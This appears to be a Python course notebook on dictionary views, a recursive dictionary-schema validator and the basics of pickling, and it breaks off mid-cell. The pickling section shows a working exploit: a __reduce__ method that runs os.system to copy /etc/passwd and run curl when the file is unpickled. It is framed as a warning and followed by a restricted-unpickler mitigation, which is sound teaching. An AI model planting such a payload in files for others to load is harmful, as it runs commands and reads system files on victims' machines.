dict_keys(['a', 'b', 'z'])
dict_values([1, 2, 100])
dict_items([('a', 1), ('b', 2), ('z', 100)])


but the view 'contents' have changed. These views are **dynamic**.
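If we do need a static copy, we have to make one explicitly. Here is a small sketch contrasting a live view with a list snapshot (the names `live_keys` and `snapshot` are just for illustration):

```python
d = {'a': 1, 'b': 2}
live_keys = d.keys()           # dynamic view
snapshot = list(d.keys())      # static copy taken right now

d['z'] = 100
del d['a']

print(list(live_keys))         # reflects the insertion and the deletion
print(snapshot)                # unchanged
```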

#### Mutating a dictionary while iterating over these views

Because these views instantly reflect any modifications made to the underlying dictionary, we have to be careful changing the dictionary while we iterate over a view! 

In [8]:
d = {'a': 1, 'b': 2, 'c': 3}

In [9]:
for k, v in d.items():
    print(k, v)
    del d[k]

a 1


RuntimeError: dictionary changed size during iteration

As you can see Python complains about this. But the interesting thing is that Python does not complain about the deletion itself - notice where the exception occurs - at the loop, not the delete statement.

In fact, the dictionary **has** changed:

In [10]:
d

{'b': 2, 'c': 3}

As you can see the key `a` is gone.

So the deletion happens just fine, but when Python continues the loop, at that point it detects that the dictionary has changed - and an exception is raised at that point. But notice the exception message - Python is complaining about the **size** of the dictionary changing... 
We'll come back to that point in a minute.

What about insertions, will Python complain about it?

In [11]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v)
    d['z'] = 100

a 1


RuntimeError: dictionary changed size during iteration

No, that's not allowed either.

It is perfectly fine to modify the values though:

In [12]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v)
    d[k] = 1000

a 1
b 2
c 3


and of course our dictionary values have changed:

In [13]:
d

{'a': 1000, 'b': 1000, 'c': 1000}

What about the other views, are they more tolerant of underlying mutations? We would not expect the key view to allow this, but what about the values view? After all it is not referencing the keys at all...

In [14]:
d = {'a': 1, 'b': 2, 'c': 3}
for v in d.values():
    print(v)
    del d['a']

1


RuntimeError: dictionary changed size during iteration

No, not allowed either! We just cannot change the size of the dictionary (and hence the size of the view too) while iterating over it.

So, if that's the limitation, then we should be able to modify the values of elements as we iterate over the keys:

In [15]:
d = {'a': 1, 'b': 2, 'c': 3}

In [16]:
for key in d.keys():
    d[key] = 100

In [17]:
d

{'a': 100, 'b': 100, 'c': 100}

Even this will work fine:

In [18]:
for k, v in d.items():
    d[k] = v * 2

In [19]:
d

{'a': 200, 'b': 200, 'c': 200}

The moral here is that you should not manipulate the keys of a dictionary as you iterate over it - either directly, or using the views.
Mutating associated values is perfectly fine.

#### Iterating over a dictionary vs iterating over the keys view

As we just mentioned, dictionaries implement the iterable protocol which iterates over the keys of the dictionary:

In [20]:
d = dict.fromkeys('python', 0)

In [21]:
for k in d:
    print(k)

p
y
t
h
o
n


This would be the same as requesting the iterator from the dictionary and using the iterator:

In [22]:
d_iter = iter(d)
for k in d_iter:
    print(k)

p
y
t
h
o
n


So, you may very well be asking yourself whether we should iterate over the keys using the dictionary's iterator or using the keys view. After all, they seem to do the same thing...

And yes, either one would be just fine for iterating over the keys of a dictionary. Let's just make sure the performance is about the same:

In [23]:
from timeit import timeit
from random import randint

d = {k: randint(0, 100) for k in range(10_000)}
keys = d.keys()

def iter_direct(d):
    for k in d:
        pass
    
def iter_view(d):
    for k in d.keys():
        pass

def iter_view_direct(view):
    for k in view:
        pass
    
print(timeit('iter_direct(d)', globals=globals(), number=20_000))
print(timeit('iter_view(d)', globals=globals(), number=20_000))
print(timeit('iter_view_direct(keys)', globals=globals(), number=20_000))

1.857292921980843
1.8094384070136584
1.8164116419502534


As you can see, the performance of iterating via the dictionary's iterator and via the view's iterator is about the same, even when a new view object is created on every call. [In fact, it's the same kind of iterator in both cases!]
And since there is really no need to re-create a view once it's been created (since it is dynamic), the overhead of creating the `keys` view is a one-time hit.
A `keys` view also provides far more functionality than just iteration - as we know it behaves like a set - so if you need to perform set operations on the keys you'll need to use the `keys` view.
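As a brief illustration of both points, the sketch below performs set operations on two `keys` views and checks that iterating the dictionary and iterating its `keys` view yield the same type of iterator (the dictionaries `d1` and `d2` are made up for the example):

```python
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 20, 'c': 30, 'd': 40}

common = d1.keys() & d2.keys()       # keys present in both dictionaries
only_d1 = d1.keys() - d2.keys()      # keys found only in d1
print(common, only_d1)

# Both ways of iterating over the keys hand back the same type of iterator
same_iter_type = type(iter(d1)) is type(iter(d1.keys()))
print(same_iter_type)
```

Note that the results of these operations are plain sets, not views.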

#### Iterating over keys and values

As we saw, we can use the `.items()` view to iterate over both the keys and values of a dictionary.

In [24]:
d = {'a': 1, 'b': 2, 'c': 3}

In [25]:
for k, v in d.items():
    print(k, v)

a 1
b 2
c 3


You might be tempted to do it this way as well:

In [26]:
for k in d:
    print(k, d[k])

a 1
b 2
c 3


But this is quite inefficient!
Let's try some timings.

In [27]:
d = {k: randint(0, 100) for k in range(10_000)}
items = d.items()

def iterate_view(view):
    for k, v in view:
        pass
    
def iterate_clunky(d):
    for k in d:
        d[k]
        
print(timeit('iterate_view(items)', globals=globals(), number=5_000))
print(timeit('iterate_clunky(d)', globals=globals(), number=5_000))

0.8359718360006809
1.3389352719532326


As you can see, it is substantially slower to iterate over both the keys and the values of the dictionary using the second approach. This is because in the second approach, we have to perform a lot of dictionary lookups - while lookups are particularly efficient in Python, they are slower than not doing a lookup at all!

#### Iterating a dictionary while mutating keys

As we mentioned earlier, we cannot mutate a dictionary's keys while iterating over it.

Let's see an example of this:

In [28]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v ** 2)
    del d[k]

a 1


RuntimeError: dictionary changed size during iteration

One way to solve this is to create a static list of all the keys, and iterate over that instead:

In [29]:
d = {'a': 1, 'b': 2, 'c': 3}
keys = list(d.keys())
print(keys)

['a', 'b', 'c']


In [30]:
for k in keys:
    value = d.pop(k)
    print(f'{value} ** 2 = {value ** 2}')

1 ** 2 = 1
2 ** 2 = 4
3 ** 2 = 9


In [31]:
d

{}

Another way would be to use the `popitem` method. We just need to know how many times we can call `popitem`, or catch the `KeyError` exception that is raised once the dictionary is empty:

In [32]:
d = {'a':1, 'b':2, 'c':3}
for _ in range(len(d)):
    key, value = d.popitem()
    print(key, value, value**2)

c 3 9
b 2 4
a 1 1


Or we can use a `while` loop:

In [33]:
d = {'a':1, 'b':2, 'c':3}
while len(d) > 0:
    key, value = d.popitem()
    print(key, value, value**2)

c 3 9
b 2 4
a 1 1


Or we can simply keep iterating indefinitely until a `KeyError` exception occurs:

In [34]:
d = {'a':1, 'b':2, 'c':3}
while True:
    try:
        key, value = d.popitem()
    except KeyError:
        break
    else:
        print(key, value, value**2)

c 3 9
b 2 4
a 1 1
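The techniques above consume the whole dictionary. If the goal is only to drop *some* of the keys, the same idea of iterating over a static copy still applies. Here is a minimal sketch of two options, using made-up data where we want to discard the even values:

```python
d = {'a': 1, 'b': 2, 'c': 3, 'd': 4}

# Option 1: iterate over a static list of the keys and delete from the dict
for k in list(d):
    if d[k] % 2 == 0:
        del d[k]
print(d)

# Option 2: leave the original alone and build a filtered dictionary
original = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
odd_only = {k: v for k, v in original.items() if v % 2}
print(odd_only)
```

The first option mutates the dictionary in place (so other references to it see the change), while the second creates a new dictionary.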


# Section 06 - Project 1

##  Project 1

In this project our goal is to validate one dictionary structure against a template dictionary.

A typical example of this might be working with JSON data inputs in an API. You are trying to validate this received JSON against some kind of template to make sure the received JSON conforms to that template (i.e. all the keys and structure are identical - value types being important, but not the value itself - so just the structure, and the data type of the values).

To keep things simple we'll assume that values can be either single values (like an integer, string, etc), or a dictionary, itself only containing single values or other dictionaries, recursively. In other words, we're not going to deal with lists as possible values. Also, to keep things simple, we'll assume that all keys are **required**, and that no extra keys are permitted.

In practice we would not have these simplifying assumptions, and although we could definitely write this ourselves, there are many 3rd party libraries that already exist to do this (such as `jsonschema`, `marshmallow`, and many more, some of which I'll cover lightly in some later videos.)

For example you might have this template:

In [1]:
template = {
    'user_id': int,
    'name': {
        'first': str,
        'last': str
    },
    'bio': {
        'dob': {
            'year': int,
            'month': int,
            'day': int
        },
        'birthplace': {
            'country': str,
            'city': str
        }
    }
}

So, a JSON document such as this would match the template:

In [2]:
john = {
    'user_id': 100,
    'name': {
        'first': 'John',
        'last': 'Cleese'
    },
    'bio': {
        'dob': {
            'year': 1939,
            'month': 11,
            'day': 27
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Weston-super-Mare'
        }
    }
}

But this one would **not** match the template (missing key):

In [3]:
eric = {
    'user_id': 101,
    'name': {
        'first': 'Eric',
        'last': 'Idle'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 3,
            'day': 29
        },
        'birthplace': {
            'country': 'United Kingdom'
        }
    }
}

And neither would this one (wrong data type):

In [4]:
michael = {
    'user_id': 102,
    'name': {
        'first': 'Michael',
        'last': 'Palin'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 'May',
            'day': 5
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Sheffield'
        }
    }
}

Write a function such as this:

In [5]:
def validate(data, template):
    # implement
    # and return True/False
    # in the case of False, return a string describing 
    # the first error encountered
    # in the case of True, string can be empty
    return state, error

That should return this:
* `validate(john, template) --> True, ''`
* `validate(eric, template) --> False, 'mismatched keys: bio.birthplace.city'`
* `validate(michael, template) --> False, 'bad type: bio.dob.month'`

Better yet, use exceptions instead of return codes and strings!

##  Project 1 - Solution

##### Solution

There are many ways to approach this, but a recursive approach here will probably be simpler (not simple, just simpl**er**!) since we want to write a function that does not make any assumptions about how many dictionaries are nested.

My approach is going to be as follows:
1. Write a recursive function
2. Maintain a breadcrumb (or *path*) of where we're at in the nested dictionaries (e.g. `bio.birthplace`)
3. Check to make sure all the required keys from the template are present in the data (for the same level)
4. For dictionary valued keys, recursively call my function
5. For non-dictionary values make sure they are of the correct type
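Before tackling the validation itself, it may help to see the first two steps (recursion plus a breadcrumb path) in isolation. The sketch below is not the solution: `iter_paths` is a hypothetical helper that only walks a nested dictionary and yields the dotted path of every non-dictionary value:

```python
def iter_paths(d, path=''):
    """Yield (dotted_path, value) for every non-dictionary value in d."""
    for key, value in d.items():
        # extend the breadcrumb with the current key
        full_path = f'{path}.{key}' if path else str(key)
        if isinstance(value, dict):
            # nested dictionary: recurse, carrying the path along
            yield from iter_paths(value, full_path)
        else:
            yield full_path, value

sample = {'a': 1, 'b': {'c': 2, 'd': {'e': 3}}}
paths = list(iter_paths(sample))
print(paths)
```

The validation function follows the same shape, except that at each level it compares the keys and value types against the template rather than just yielding them.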

I'm going to build this function up little by little.

Let's first start by determining if we have mismatched keys: missing keys required by template, or extra keys in data not specified by template:

In [6]:
def match_keys(data, valid, path):
    # path is just a string containing the current path
    # that we can use to append the extra/missing keys
    # and create a full path for the mismatched keys
    data_keys = data.keys()
    valid_keys = valid.keys()
    # we could just use data_keys ^ valid_keys
    # to get mismatched keys, but I prefer to differentiate
    # between missing and extra keys separately
    extra_keys = data_keys - valid_keys
    missing_keys = valid_keys - data_keys
    # Finally, build up the error state and message
    if missing_keys or extra_keys:
        missing_msg = ('missing keys:' +
                       ','.join({path + '.' + str(key) 
                                 for key in missing_keys})
                      ) if missing_keys else ''
        extras_msg = ('extra keys:' + 
                     ','.join({path + '.' + str(key) 
                               for key in extra_keys})
                     ) if extra_keys else ''
        return False, ' '.join((missing_msg, extras_msg))
    else:
        return True, None

Let's test this function out:

In [7]:
t = {'a': int, 'b': int, 'c': int, 'd': int}
d = {'a': 'wrong type', 'b': 100, 'c': 200, 'd': {'wrong': 'type'}}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

True None


In [8]:
d = {'a': 'test', 'b': 'test', 'c': 'test'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False missing keys:some.path.d 


In [9]:
d = {'a': 'test', 'b': 'test', 'c': 'test', 'd': 'test', 'z': 'extra'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False  extra keys:some.path.z


In [10]:
d = {'a': 'test', 'b': 'test', 'z': 'extra'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False missing keys:some.path.d,some.path.c extra keys:some.path.z
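
The set operations used in `match_keys` work directly on dictionary key views, without converting them to sets first. Here is a small sketch of that idea (the dictionaries `t_demo` and `d_demo` are made up for illustration):

```python
# Hypothetical template and data, for illustration only
t_demo = {'a': int, 'b': int, 'c': int}
d_demo = {'a': 1, 'b': 2, 'z': 3}

# dict.keys() returns a set-like view, so -, ^, & and | all work on it
missing = t_demo.keys() - d_demo.keys()      # required by template, absent from data
extra = d_demo.keys() - t_demo.keys()        # present in data, not in template
mismatched = t_demo.keys() ^ d_demo.keys()   # symmetric difference of the two

print(missing, extra)
print(mismatched == missing | extra)
```

Since these results are sets, the order in which several mismatched keys show up in an error message is not guaranteed. Wrapping them in `sorted(...)` before joining is one option if a stable message matters.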


OK, so now let's write a function that matches the types of corresponding values (each template value could be an actual type, or a nested dictionary):

In [11]:
def match_types(data, template, path):
    # assume here that the keys have already been matched OK
    # but do not assume that the keys are necessarily in the same
    # order in both the data and the template
    for key, value in template.items():
        if isinstance(value, dict):
            template_type = dict
        else:
            template_type = value
        data_value = data.get(key, object())
        if not isinstance(data_value, template_type):
            err_msg = ('incorrect type: ' + path + '.' + key +
                       ' -> expected ' + template_type.__name__ +
                       ', found ' + type(data_value).__name__)
            return False, err_msg
    return True, None        

Let's test this one out:

In [12]:
t = {'a': int, 'b': str, 'c': {'d': int}}
d = {'a': 100, 'b': 'test', 'c': {'some': 'dict'}}
match_types(d, t, 'some.path')

(True, None)

In [13]:
d = {'a': 100, 'b': 'test', 'c': 'unexpected'}
match_types(d, t, 'some.path')

(False, 'incorrect type: some.path.c -> expected dict, found str')

In [14]:
d = {'a': 100, 'b': 200, 'c': {'some': 'dict'}}
match_types(d, t, 'some.path')

(False, 'incorrect type: some.path.b -> expected str, found int')
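
One thing to keep in mind with an `isinstance`-based check: `bool` is a subclass of `int` in Python, so a template that asks for `int` will also accept `True` or `False`. The sketch below illustrates this, along with one possible stricter check. Note that `strict_isinstance` is a hypothetical helper of my own, not part of the solution in this section:

```python
def strict_isinstance(value, expected_type):
    # Hypothetical helper: reject bools unless bool was explicitly requested
    if isinstance(value, bool) and expected_type is not bool:
        return False
    return isinstance(value, expected_type)

print(isinstance(True, int))           # bool subclasses int, so this passes
print(strict_isinstance(True, int))    # rejected by the stricter check
print(strict_isinstance(10, int))
print(strict_isinstance(True, bool))
```

Whether this matters depends on your data. For the exercise here the plain `isinstance` check is enough.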

OK, so far so good!

Now it's time to combine these into our main recursive function:

In [15]:
def recurse_validate(data, template, path):
    # validate keys match
    is_ok, err_msg = match_keys(data, template, path)
    if not is_ok:
        return False, err_msg

    # validate individual data types match
    is_ok, err_msg = match_types(data, template, path)
    if not is_ok:
        return False, err_msg
    
    # Now see if we have nested dictionaries in template
    # (or data, since we know both keys and value data types match)
    dictionary_type_keys = {key for key, value in template.items()
                           if isinstance(value, dict)}
    for key in dictionary_type_keys:
        sub_path = path + '.' + str(key)
        sub_template = template[key]
        sub_data = data[key]
        is_ok, err_msg = recurse_validate(sub_data, sub_template, sub_path)
        if not is_ok:
            return False, err_msg
        
    return True, None

Now let's test this function:

In [16]:
is_ok, err_msg = recurse_validate(john, template, 'root')
print(is_ok, err_msg)

True None


In [17]:
is_ok, err_msg = recurse_validate(eric, template, 'root')
print(is_ok, err_msg)

False missing keys:root.bio.birthplace.city 


In [18]:
is_ok, err_msg = recurse_validate(michael, template, 'root')
print(is_ok, err_msg)

False incorrect type: root.bio.dob.month -> expected int, found str


Nice, now all that's left is to write our main function - its only role really is to hide the recursive function from the caller, and provide a "start" path (which should be empty):

In [19]:
def validate(data, template):
    return recurse_validate(data, template, '')

In [20]:
persons = ((john, 'John'), (eric, 'Eric'), (michael, 'Michael'))

In [21]:
for person, name in persons:
    is_ok, err_msg = validate(person, template)
    print(f'{name}: valid={is_ok}: {err_msg}')

John: valid=True: None
Eric: valid=False: missing keys:.bio.birthplace.city 
Michael: valid=False: incorrect type: .bio.dob.month -> expected int, found str


As an additional tweak, I'm not going to return a tuple with the state and the error message, instead I'm going to use exceptions to do the same thing:

In [22]:
class SchemaError(Exception):
    pass

def validate(data, template):
    is_ok, err_msg = recurse_validate(data, template, '')
    if not is_ok:
        raise SchemaError(err_msg)

Then we can use the validator this way:

In [23]:
validate(john, template)

In [24]:
validate(eric, template)

SchemaError: missing keys:.bio.birthplace.city 

In [25]:
validate(michael, template)

SchemaError: incorrect type: .bio.dob.month -> expected int, found str

Of course, we could use this approach throughout instead of returning a status and an error message - this would make this a bit cleaner, and we can also differentiate between key mismatches vs value mismatches:

In [26]:
class SchemaError(Exception):
    pass

class SchemaKeyMismatch(SchemaError):
    pass

class SchemaTypeMismatch(SchemaError, TypeError):
    pass

In [27]:
def match_keys(data, valid, path):
    # path is just a string containing the current path
    # that we can use to append the extra/missing keys
    # and create a full path for the mismatched keys
    data_keys = data.keys()
    valid_keys = valid.keys()
    # we could just use data_keys ^ valid_keys
    # to get mismatched keys, but I prefer to differentiate
    # between missing and extra keys separately
    extra_keys = data_keys - valid_keys
    missing_keys = valid_keys - data_keys
    # Finally, build up the error state and message
    if missing_keys or extra_keys:
        missing_msg = ('missing keys:' +
                       ','.join({path + '.' + str(key) 
                                 for key in missing_keys})
                      ) if missing_keys else ''
        extras_msg = ('extra keys:' + 
                     ','.join({path + '.' + str(key) 
                               for key in extra_keys})
                     ) if extra_keys else ''
        raise SchemaKeyMismatch(' '.join((missing_msg, extras_msg)))

In [28]:
def match_types(data, template, path):
    # assume here that the keys have already been matched OK
    # but do not assume that the keys are necessarily in the same
    # order in both the data and the template
    for key, value in template.items():
        if isinstance(value, dict):
            template_type = dict
        else:
            template_type = value
        data_value = data.get(key, object())
        if isinstance(data_value, template_type):
            continue
        else:
            err_msg = ('incorrect type: ' + path + '.' + key +
                       ' -> expected ' + template_type.__name__ +
                       ', found ' + type(data_value).__name__)
            raise SchemaTypeMismatch(err_msg)

In [29]:
def recurse_validate(data, template, path):
    match_keys(data, template, path)
    match_types(data, template, path)

    # Now see if we have nested dictionaries in template
    # (or data, since we know both keys and value data types match)
    dictionary_type_keys = {key for key, value in template.items()
                           if isinstance(value, dict)}
    for key in dictionary_type_keys:
        sub_path = path + '.' + str(key)
        sub_template = template[key]
        sub_data = data[key]
        recurse_validate(sub_data, sub_template, sub_path)

In [30]:
def validate(data, template):
    recurse_validate(data, template, '')

In [31]:
validate(john, template)

In [32]:
validate(eric, template)

SchemaKeyMismatch: missing keys:.bio.birthplace.city 

In [33]:
validate(michael, template)

SchemaTypeMismatch: incorrect type: .bio.dob.month -> expected int, found str

The nice thing about the way we have structured our exceptions is that we can catch them either as specific `SchemaKeyMismatch` or `SchemaTypeMismatch` exceptions, but also more broadly as `SchemaError` exceptions:

In [34]:
try:
    validate(eric, template)
except SchemaError as ex:
    print(ex)

missing keys:.bio.birthplace.city 


In [35]:
try:
    validate(eric, template)
except SchemaKeyMismatch as ex:
    print('mismatched keys, doing some specific handling for that')
    print(ex)
except SchemaTypeMismatch as ex:
    print('mismatched types, doing some specific handling for that')
    print(ex)

mismatched keys, doing some specific handling for that
missing keys:.bio.birthplace.city 


In [36]:
try:
    validate(michael, template)
except SchemaKeyMismatch as ex:
    print('mismatched keys, doing some specific handling for that')
    print(ex)
except SchemaTypeMismatch as ex:
    print('mismatched types, doing some specific handling for that')
    print(ex)

mismatched types, doing some specific handling for that
incorrect type: .bio.dob.month -> expected int, found str
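
Because `SchemaTypeMismatch` also inherits from `TypeError`, code that only knows about the built-in `TypeError` will catch it too, while `SchemaKeyMismatch` will not be caught that way. A minimal sketch (the classes are repeated so the snippet runs on its own, and `caught_as_type_error` is a hypothetical helper used only for this demonstration):

```python
class SchemaError(Exception):
    pass

class SchemaKeyMismatch(SchemaError):
    pass

class SchemaTypeMismatch(SchemaError, TypeError):
    pass

def caught_as_type_error(exc):
    # Raise the given exception and report whether a plain
    # `except TypeError` clause would catch it
    try:
        raise exc
    except TypeError:
        return True
    except SchemaError:
        return False

print(caught_as_type_error(SchemaTypeMismatch('bad type')))
print(caught_as_type_error(SchemaKeyMismatch('bad keys')))
```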


# Section 07 - Serialization and Deserialization

##  Pickling

#### Not Secure!

Pickling is not a secure way to deserialize data objects. **DO NOT** unpickle anything you did not pickle yourself. You have been **WARNED**!

Here's how easy it is to create an exploit.

I am going to pickle an object that is going to use the unix shell (admittedly this will not work on Windows, but it could with some more complicated code - plus I don't need this to run on every machine in the world, just as many as possible - at least that's the mindset if I were a hacker I guess)

In [1]:
import os
import pickle


class Exploit():
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))


def serialize_exploit(fname):
    with open(fname, 'wb') as f:
        pickle.dump(Exploit(), f)

Now, I serialize this code to a file:

In [2]:
serialize_exploit('loadme')

Now I send this file to some unsuspecting recipients and tell them they just need to load this up in their Python app. They deserialize the pickled object like so:

In [3]:
import pickle

pickle.load(open('loadme', 'rb'))

0

And now take a look at your folder that contains this notebook!
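
If you really have no choice but to unpickle data from somewhere else, one mitigation is to restrict which globals the unpickler is allowed to look up, by overriding `Unpickler.find_class`. The sketch below follows that pattern. The names `RestrictedUnpickler`, `restricted_loads`, `SAFE_BUILTINS` and `Probe` are my own, and the whitelist is just an assumption about what you might want to allow. Treat it as reducing the risk, not removing it:

```python
import builtins
import io
import os
import pickle

# Assumed whitelist - adjust to whatever your data actually needs
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle data asks for a global (class or function)
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f'global {module}.{name} is forbidden')

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Probe:
    # Harmless stand-in for the exploit: asks the unpickler to call os.getcwd
    def __reduce__(self):
        return (os.getcwd, ())

print(restricted_loads(pickle.dumps({'a': [1, 2, (3, 4)]})))

try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as ex:
    print('blocked:', ex)
```

Plain containers, numbers and strings never go through `find_class`, which is why the first call succeeds while the second one is rejected before anything gets called.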

#### Pickling Dictionaries

In this part of the course I am only going to discuss pickling basic data types such as numbers, strings, tuples, lists, sets and dictionaries.

In general tuples, lists, sets and dictionaries are all picklable as long as their elements are themselves picklable.
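
To illustrate the "as long as their elements are themselves picklable" part, here is a small sketch using a generator as the non-picklable element (the variable names are just for this example):

```python
import pickle

picklable = [10, 'a', (1, 2), {'x': {1, 2}}]
not_picklable = [10, 'a', (n for n in range(3))]  # contains a generator

restored = pickle.loads(pickle.dumps(picklable))
print(restored == picklable)

try:
    pickle.dumps(not_picklable)
except TypeError as ex:
    # generators cannot be pickled, so the list containing one cannot either
    print('not picklable:', ex)
```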

Let's start by serializing some simple data types, such as strings and numbers.

Instead of serializing to a file, I will store the resulting pickle data in a variable, so we can easily inspect it and unpickle it:

In [4]:
import pickle

In [5]:
ser = pickle.dumps('Python Pickled Peppers')

In [6]:
ser

b'\x80\x03X\x16\x00\x00\x00Python Pickled Peppersq\x00.'

We can deserialize the data this way:

In [7]:
deser = pickle.loads(ser)

In [8]:
deser

'Python Pickled Peppers'

We can do the same thing with numerics:

In [9]:
ser = pickle.dumps(3.14)

In [10]:
ser

b'\x80\x03G@\t\x1e\xb8Q\xeb\x85\x1f.'

In [11]:
deser = pickle.loads(ser)

In [12]:
deser

3.14

We can do the same with lists and tuples:

In [13]:
d = [10, 20, ('a', 'b', 30)]

In [14]:
ser = pickle.dumps(d)

In [15]:
ser

b'\x80\x03]q\x00(K\nK\x14X\x01\x00\x00\x00aq\x01X\x01\x00\x00\x00bq\x02K\x1e\x87q\x03e.'

In [16]:
deser = pickle.loads(ser)

In [17]:
deser

[10, 20, ('a', 'b', 30)]

Note that the original and the deserialized objects are equal, but not identical:

In [18]:
d is deser, d == deser

(False, True)

This works the same way with sets too:

In [19]:
s = {'a', 'b', 'x', 10}

In [20]:
s

{10, 'a', 'b', 'x'}

In [21]:
ser = pickle.dumps(s)
print(ser)

b'\x80\x03cbuiltins\nset\nq\x00]q\x01(X\x01\x00\x00\x00aq\x02K\nX\x01\x00\x00\x00xq\x03X\x01\x00\x00\x00bq\x04e\x85q\x05Rq\x06.'


In [22]:
deser = pickle.loads(ser)
print(deser)

{'a', 10, 'b', 'x'}


And finally, we can pickle dictionaries as well:

In [23]:
d = {'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}

In [24]:
print(d)

{'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}


In [25]:
ser = pickle.dumps(d)

In [26]:
ser

b'\x80\x03}q\x00(X\x01\x00\x00\x00bq\x01K\x01X\x01\x00\x00\x00aq\x02K\x02X\x01\x00\x00\x00cq\x03}q\x04(X\x01\x00\x00\x00xq\x05K\nX\x01\x00\x00\x00yq\x06K\x14uu.'

In [27]:
deser = pickle.loads(ser)

In [28]:
print(deser)

{'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}


In [29]:
d == deser

True

What happens if we pickle a dictionary that has two of its values set to another dictionary?

In [30]:
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}

In [31]:
print(d2)

{'x': 100, 'y': {'a': 10, 'b': 20}, 'z': {'a': 10, 'b': 20}}


Let's say we pickle `d2`:

In [32]:
ser = pickle.dumps(d2)

Now let's unpickle that object:

In [33]:
d3 = pickle.loads(ser)

In [34]:
d3

{'x': 100, 'y': {'a': 10, 'b': 20}, 'z': {'a': 10, 'b': 20}}

That seems to work... Is that sub-dictionary still the same as the original one?

In [35]:
d3['y'] == d2['y']

True

In [36]:
d3['y'] is d2['y']

False

But consider the original dictionary `d2`: both the `y` and `z` keys referenced the **same** dictionary `d1`:

In [37]:
d2['y'] is d2['z']

True

How did this work with our deserialized dictionary?

In [38]:
d3['y'] is d3['z']

True

As you can see, the relative shared reference is maintained.

The deserialized dictionary `d3` is equal to the original `d2`, but it is made up of entirely new objects. So, when Python serializes the dictionary, it behaves very similarly to serializing a deep copy of the dictionary. The same thing happens with other collection types such as lists, sets, and tuples.
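
The comparison with a deep copy can be checked directly. This sketch runs the same dictionary through a pickle round trip and through `copy.deepcopy`, and looks at the same two properties in each case (the names `via_pickle` and `via_deepcopy` are just for illustration):

```python
import copy
import pickle

d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}

via_pickle = pickle.loads(pickle.dumps(d2))
via_deepcopy = copy.deepcopy(d2)

for result in (via_pickle, via_deepcopy):
    # equal to the original, but no longer referencing the original d1...
    print(result == d2, result['y'] is d1)
    # ...while the sharing between 'y' and 'z' is kept inside the copy
    print(result['y'] is result['z'])
```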

What this means though is that you have to be very careful how you use serialization and deserialization.

Consider this piece of code:

In [39]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
print(d2)
d1['c'] = 3
print(d1)
print(d2)

{'a': 1, 'b': 2}
{'x': 10, 'y': {'a': 1, 'b': 2}}
{'a': 1, 'b': 2, 'c': 3}
{'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}


Now suppose we pickle our dictionaries to restore those values the next time around, but use the same code, expecting the same result:

In [40]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)

# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2

# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)

# and continue processing as before
print(d1)
print(d2)
d1['c'] = 3
print(d1)
print(d2)

{'a': 1, 'b': 2}
{'x': 10, 'y': {'a': 1, 'b': 2}}
{'a': 1, 'b': 2, 'c': 3}
{'x': 10, 'y': {'a': 1, 'b': 2}}


So just remember that as soon as you pickle a dictionary, whatever object references it had to another object is essentially lost - just as if you had done a deep copy first. It's a subtle point, but one that can easily lead to bugs if we're not careful.

However, the pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that **relative** references are preserved.

Let's see an example of what I mean by this:

In [41]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __eq__(self, other):
        return self.name == other.name and self.age == other.age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [42]:
john = Person('John Cleese', 79)
eric = Person('Eric Idle', 75)
michael = Person('Michael Palin', 75)

In [43]:
parrot_sketch = {
    "title": "Parrot Sketch",
    "actors": [john, michael]
}

ministry_sketch = {
    "title": "Ministry of Silly Walks",
    "actors": [john, michael]
}

joke_sketch = {
    "title": "Funniest Joke in the World",
    "actors": [eric, michael]
}

In [44]:
fan_favorites = {
    "user_1": [parrot_sketch, joke_sketch],
    "user_2": [parrot_sketch, ministry_sketch]
}

In [45]:
from pprint import pprint
pprint(fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Ministry of Silly Walks'}]}


As you can see we have some shared references, for example:

In [46]:
fan_favorites['user_1'][0] is fan_favorites['user_2'][0]

True

Let's store the id of the `parrot_sketch` for later reference:

In [47]:
